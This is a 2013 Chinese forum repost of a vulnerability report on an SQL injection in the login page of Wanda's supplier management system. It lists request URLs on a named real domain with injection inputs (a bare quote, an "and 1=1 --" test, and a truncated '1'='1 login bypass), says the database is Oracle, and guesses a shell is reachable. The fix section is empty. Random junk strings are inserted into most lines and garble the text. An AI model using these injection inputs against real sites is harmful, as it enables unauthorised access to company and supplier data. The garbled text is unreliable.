找回密码
 立即注册
查看: 3414|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。$ {/ \1 [" |. _/ m8 Q7 V
详细说明:
! ^6 D; v$ n/ L0 y- h/ v+ R万达scm系统登陆框sql注入。8 M9 S5 c; x) Q9 ?- ~( q

) X. H) M( X" y, j/ phttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27' O9 t4 y. y% @9 c
3 Q1 c  F6 S: M* _

0 D: i; n; {* m, ~! J% F% J. v8 O500错误。
9 |. x2 v0 L0 ~# R* M$ K( B1 [
# U6 i2 A) V5 B  S; [用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
- o/ X- S; ]4 g# ^! Dhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png! U( p6 r. d9 C. R% _1 k" x; r
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)- G3 z/ Z5 w- C* a
经过分析,登陆验证的过程应该是:8 h3 S( R, g+ p& ?
9 H! q' W. j; J) T: k# ^. f9 G
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。5 `2 O* I& R+ {3 h3 m! Q
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png4 r* r: W. a; ^4 J! s% i

. v$ W; B9 H1 Y- G4 coracle数据库,存在注入点。@大连万达,你怎么看?5 ]# i5 x4 s( I2 e0 a+ ]
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
$ M& j3 Z5 R/ O2 m: \& ?
  h6 d* q7 l" N8 x+ H9 w. G系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
1 P) P  F4 C! W  @3 V漏洞证明:
1 u  \# u: o  i- h& Q万达scm系统登陆框sql注入。: i- x& y9 l+ n9 q5 @+ y

6 F, ?, O- e  A; [! Ahttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27; R% D- d5 d. c
0 s" f4 G: A' w) m+ a
( i( _* k4 w# ]5 g
500错误。
9 f9 R' v' A* R3 ^' m6 V; Z* L) t$ V2 q8 u; B8 |6 y
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。0 \+ y2 C1 h3 y) E) k5 F5 ]  B$ c+ `
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png" W, }% M5 E* k" R

/ S) @1 J5 E$ _) R* S! P9 {6 c3 x1 S
(截图有一点问题)
- z( R8 G9 t4 O" y( R: [( w6 ^7 u9 k
3 s1 o3 {1 Q, N怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
0 j- ]1 p% v( j) V. Y1 T# t/ N% ^+ D4 {" p' k7 L  x3 c3 V
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
5 ]5 m* N$ d4 [- x! d1 d; T; o" C  S/ X9 w/ K. Y
绕过:
! u) E% q( f; `: H' `http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1
0 u0 ^" W! o7 e$ t# e# k: d2 e6 Q$ i% a2 D% r+ ^2 l

9 w. e/ ~( J  Y! a0 ]9 foracle数据库,存在注入点。@大连万达,你怎么看?: `* l' p, c6 q! p, g9 \  z
​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。
+ m" ^+ C' b3 X! c6 w
. X- U8 k% e; U; y, X0 e修复方案:
( o! g! H5 i: b/ T。。。, R. k  w+ t* \" K
7 ?$ z! N  A& ?, o( d( S. O0 p: P3 ]

/ j6 F6 I! c; z厂商已经确认; a2 _$ t8 r! }# w0 j6 B; H
; U8 x; R, |2 ]" H0 M
[/td][/tr]
7 q. o; g, H" A- b) o1 L; }4 x& A[/table]: H& A7 o8 W8 Z; X& `' k  V

% W$ [9 x, O- Q# g% p! t' S4 h# K0 X/ t# p8 X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表